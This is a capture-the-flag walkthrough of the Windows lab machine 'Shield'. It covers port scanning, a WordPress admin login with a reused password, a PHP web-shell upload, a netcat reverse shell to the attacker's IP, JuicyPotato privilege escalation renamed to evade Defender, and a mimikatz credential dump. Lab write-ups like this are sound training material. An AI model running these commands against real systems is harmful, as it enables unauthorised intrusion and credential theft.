Shield Walkthrough

After the Vaccine Walkthrough, here I'm with Shield box. Let's hack and grab the flags.

As I mentioned before, the starting point machines are a series of 9 easily rated machines that should be rooted in sequence. So it means, if you need to go through this box, first of all you must have a complete Vaccine machine.

Enough talks, 🥱 Let’s Get It Started 🐱‍💻

Disclaimers: No flags (user/root) are shown in this writeup (as usual in writeups), so follow the procedure to grab the flags! 🐱‍👤

00. Start Machine …

To start machine, just click "Join Machine".

Then you can see the IP address for that machine. Usually it is 10.10.10.29 🤠

Before going enumeration steps we can simply ping to the IP address and check our VPN connection and whether the machine is alive. Sometimes the machines might "Disable" ping requests from passing through the firewall. But in most cases ping will be a success! 🙂

┌──(root💀Hidd3nWiki)-[~/Documents/Shield]
└─# ping 10.10.10.29 -c 2
PING 10.10.10.29 (10.10.10.29) 56(84) bytes of data.
64 bytes from 10.10.10.29: icmp_seq=1 ttl=127 time=235 ms
64 bytes from 10.10.10.29: icmp_seq=2 ttl=127 time=242 ms

--- 10.10.10.29 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1003ms
rtt min/avg/max/mdev = 234.989/238.250/241.512/3.261 ms

As a ping result, It's TTL=127. There is only one route between machine and us (VPN). So definitely it will be a Windows machine.

01. Enumeration First …

01.1 Fast ports scan

As usual, run Nmap fast scan for all TCP ports to identify the ports which are open.

nmap -n -vv --open -T4 -p- -oN AllPorts.nmap 10.10.10.29

-n  : Never do DNS resolution
-vv	: Extra verbosity
--open	: Output only open ports
-p-	: Full TCP ports range (65535)
-T4	: Aggressive (4) speeds scans; assumes you are on a reasonably fast and reliable network

Here is the output 👇

┌──(root💀Hidd3nWiki)-[~/Documents/Shield]
└─# nmap -n -vv --open -T4 -p- -oN AllPorts.nmap 10.10.10.29
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-20 09:11 EDT
Initiating Ping Scan at 09:11
Scanning 10.10.10.29 [4 ports]
Completed Ping Scan at 09:11, 0.30s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 09:11
Scanning 10.10.10.29 [65535 ports]
Discovered open port 3306/tcp on 10.10.10.29
Discovered open port 80/tcp on 10.10.10.29
SYN Stealth Scan Timing: About 6.12% done; ETC: 09:19 (0:07:56 remaining)
SYN Stealth Scan Timing: About 14.99% done; ETC: 09:18 (0:05:46 remaining)
SYN Stealth Scan Timing: About 24.54% done; ETC: 09:17 (0:04:40 remaining)
SYN Stealth Scan Timing: About 32.52% done; ETC: 09:17 (0:04:11 remaining)
SYN Stealth Scan Timing: About 39.61% done; ETC: 09:17 (0:03:50 remaining)
SYN Stealth Scan Timing: About 53.18% done; ETC: 09:17 (0:02:39 remaining)
SYN Stealth Scan Timing: About 70.11% done; ETC: 09:16 (0:01:30 remaining)
Completed SYN Stealth Scan at 09:15, 253.94s elapsed (65535 total ports)
Nmap scan report for 10.10.10.29
Host is up, received echo-reply ttl 127 (0.22s latency).
Scanned at 2021-05-20 09:11:32 EDT for 254s
Not shown: 65533 filtered ports
Reason: 65533 no-responses
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE REASON
80/tcp   open  http    syn-ack ttl 127
3306/tcp open  mysql   syn-ack ttl 127

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 254.38 seconds
           Raw packets sent: 131239 (5.774MB) | Rcvd: 170 (7.464KB)

Really? There are only two ports open. 😑😑😶

01.2 Run Nmap Scripting Engine

To get the best result, We can run the Nmap Scripting Engine for all open ports. Now we know all of the open ports and therefore we can point out and run the script engine as fast as possible.

┌──(root💀Hidd3nWiki)-[~/Documents/Shield]
└─# nmap -sV -sC -oN DetailPorts.nmap -p 80,3306 10.10.10.29
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-20 09:27 EDT
Nmap scan report for 10.10.10.29
Host is up (0.23s latency).

PORT     STATE SERVICE VERSION
80/tcp   open  http    Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
3306/tcp open  mysql   MySQL (unauthorized)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.56 seconds

There are 2 main ports. One is running webserver and other one is running MySQL server. 🤷‍♂️🤷‍♂️

01.3 Discover more on port 80

🕵️‍♀️ Now we have only two open ports, so I chose port 80 first. Now you have a pretty big idea about what we need to do with port 80 right? Let's open our web browser, type 10.10.10.29 and then hit enter.

What the hell! Feel like there are more steps, 😖 Now we need to find whether there are any other directories here?

Again it's time to start fuzzing. I have already told you how to use dirsearchtool in oopsie walkthrough. Now it's time to learn a new cool tool right. 😍😎 The tool is ffuf. A fast web fuzzer written in Go.

You can download and install this tool by reading this. It must be installed on your OS if you are willing to face OSCP. Because it helps a lot more than ordinary Wfuzztool.

Let's enumerate the web directories!!

ffuf -w /usr/share/wordlists/dirb/common.txt -u http://10.10.10.29/FUZZ

Here is the output. 👇👇

┌──(root💀Hidd3nWiki)-[~/Documents/Shield]
└─# ffuf -w /usr/share/wordlists/dirb/common.txt -u http://10.10.10.29/FUZZ        

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.2.1
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.10.29/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirb/common.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
________________________________________________

                        [Status: 200, Size: 703, Words: 27, Lines: 32]
wordpress               [Status: 301, Size: 152, Words: 9, Lines: 2]
:: Progress: [4614/4614] :: Job [1/1] :: 155 req/sec :: Duration: [0:00:33] :: Errors: 0 ::

So we have only one directory and it is wordpress. Let's jump to our web browser and navigate to the http://10.10.10.29/wordpress

Now you can see there is a wordpress site hosted on the server. So now, time to use wpscan tool. By using this tool we can do lots of things on Wordpress CMS like enumerating plugins, users, themes, backups and also we can use this tool to brute force wordpress passwords.

wpscan --url http://10.10.10.29/wordpress -e u

Here is the output. 👇👇

┌──(root💀Hidd3nWiki)-[~/Documents/Shield]
└─# wpscan --url http://10.10.10.29/wordpress -e u
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.14
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://10.10.10.29/wordpress/ [10.10.10.29]
[+] Started: Thu May 20 10:33:23 2021

  <snap>
  ............
  </snap>

[+] admin
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://10.10.10.29/wordpress/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpscan.com/register

[+] Finished: Thu May 20 10:33:31 2021
[+] Requests Done: 13
[+] Cached Requests: 42
[+] Data Sent: 3.559 KB
[+] Data Received: 9.893 KB
[+] Memory used: 122.016 MB
[+] Elapsed time: 00:00:08

So as you can see there is only one user called admin in this wordpress site. Let's brute force that user using rockyou password.

wpscan --url http://10.10.10.29/wordpress --usernames admin --passwords /usr/share/wordlists/rockyou.txt

But wait, ✋✋

Password brute forcing is more time consuming here. Since these boxes are in sequence, we can check previous credentials. 🙄🙄 in vaccine walkthrough we had found some passwords, if you check one by one you will get the right one. here it is P@s5w0rd! So the credentials for wordpress login are

admin : P@s5w0rd!

And if you are not familiar with wordpress sites, /wp-admin is the login page for most of the wordpress sites and it is the default login path. bla bla bala...

Anyway go to your browser again and navigate tohttp://10.10.10.29/wordpress/wp-admin . Now you are end up at login page.

Now you can enter above credentials ☝☝ and click enter. You are successfully logging to the wordpress site as admin. 👑👑

02. Foothold

Now it's time to upload reverse shell. But keep in mind that you are on the Windows machine. So you must have windows php reverse shell to gain access. Let's upload a bind shell. You can download it from here. And also we need netcat binary file to get reverse shell. You can download it from here. 😊😊

wget https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/php/simple-backdoor.php
wget https://github.com/int0x33/nc.exe/raw/master/nc.exe

By looking at the dashboard settings, it's obvious that we have an option to upload media, themes, pages, etc. I’ll start from the themes to see what we can do.

Then click Add New button.

Browse and upload both netcat binary and bind shell php script.

Click "Install Now" button to upload. When you upload the files, You might get an error like this. It's just ok to ignore this error. 😉😉

Then navigate tohttp://10.10.10.29/wordpress/wp-content/Uploads/simple-backdoor.php?cmd=dir

As you can see, now we have a simple bind shell. Let's gain reverse shell using this with the help of our netcat binary file. First, power up a netcat listener then navigate to following url. (Change the <YourIP> and <PORT> as yours). %20 is indicated as space in url encoding. 😋😋

http://10.10.10.29/Wordpress/wp-content/Uploads/simple-backdoor.php?cmd=.\nc.exe%20-e%20cmd.exe%20<YourIP>%20<PORT>

Now we are on the box as iusruser. Let's find the user flag.

Here we have one user called sandraand we don't have access to this account. It's means this is time to escalate privileges.

03. Privilege Escalation

Let's enumerate further to get any vulnerability to gain privilege access. First, we need to check system info.

C:\Users>systeminfo
systeminfo

Host Name:                 SHIELD
OS Name:                   Microsoft Windows Server 2016 Standard
OS Version:                10.0.14393 N/A Build 14393
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Member Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:
Product ID:                00376-30000-00299-AA303
Original Install Date:     2/4/2020, 12:58:01 PM
System Boot Time:          5/20/2021, 9:43:58 AM
System Manufacturer:       VMware, Inc.
System Model:              VMware7,1
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              VMware, Inc. VMW71.00V.13989454.B64.1906190538, 6/19/2019
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume2
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory:     2,047 MB
Available Physical Memory: 1,031 MB
Virtual Memory: Max Size:  2,431 MB
Virtual Memory: Available: 1,375 MB
Virtual Memory: In Use:    1,056 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    MEGACORP.LOCAL
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: vmxnet3 Ethernet Adapter
                                 Connection Name: Ethernet0 2
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.29
                                 [02]: fe80::1588:3a1b:bef9:58b8
                                 [03]: dead:beef::1588:3a1b:bef9:58b8
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.

Then check what privileges we have now.

C:\Users>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name          Description                               State
======================= ========================================= =======
SeChangeNotifyPrivilege Bypass traverse checking                  Enabled
SeImpersonatePrivilege  Impersonate a client after authentication Enabled 👈
SeCreateGlobalPrivilege Create global objects                     Enabled

Woooh!! We have the SeImpersonatePrivilegeenabled. 🤩🤩 You know what it means, it means we can run juicy potato to gain privilege. 🥔🥔Let's do it..

Juicy Potato is a variant of the exploit that allows service accounts on Windows to escalate to SYSTEM (highest privileges) by leveraging the BITS and the SeAssignPrimaryToken or SeImpersonate privilege in a MiTM attack.

Download the JuicyPotato binary file and rename it to another file name. Because sometimes windows defender will hate us. And we need to upload it to the box. To do so, power up python demon web server on your machine.

┌──(root💀Hidd3nWiki)-[~/Documents/Shield]
└─# mv JuicyPotato.exe potato.exe

┌──(root💀Hidd3nWiki)-[~/Documents/Shield]
└─# python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

Then we need to upload it in to the box. Type the following command on windows machine (Change <YourIP>).

Powershell -c "IWR -useBasicParsing http://<YourIP>:8000/potato.exe -o potato.exe"

If you read the documentation of Juicy Potato you will realize it needs Batch file to run. So now we need to create bat file using following commands.

echo START C:\inetpub\wwwroot\wordpress\wp-content\uploads\nc.exe -e powershell.exe YourIP YourPort > sh3ll.bat

Change YourIP and YourPort as yours. After create the batch file, view that file using type command to verify.

Then all the things are fine. Now it's time to exploit. Let's power up netcat listener again and execute the following command. If you failed to get reverse shell; change the -c parameter (CLSID) from using this document and run again. 😎

.\potato.exe -t * -c {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} -p C:\inetpub\wwwroot\wordpress\wp-content\Uploads\sh3ll.bat -l 1337

We are done. Now we have ultimate power. 🤠🤠

04. Post Exploitation

Now we are at NT AUTHORITY\SYSTEM level. So let’s upload mimikatz and see what we can pull. Mimikatz can be used to dump cached passwords. Download mimikatz tool from here and upload it to the box.

wget https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20210512/mimikatz_trunk.zip && unzip mimikatz_trunk.zip && cd x64 && python3 -m http.server

IWR -useBasicParsing http://<YourIP>:8000/mimikatz.exe -o mcat.exe

Then we can run that file by typing .\mcat

We execute mimikatz and use the sekurlsa command to extract logon passwords: sekurlsa::logonpasswords

And we found the password Password1234! for domain user Sandra .

Find me on @twitter

PreviousVaccine Walkthrough NextPathfinder Walkthrough

Last updated 4 years ago

Was this helpful?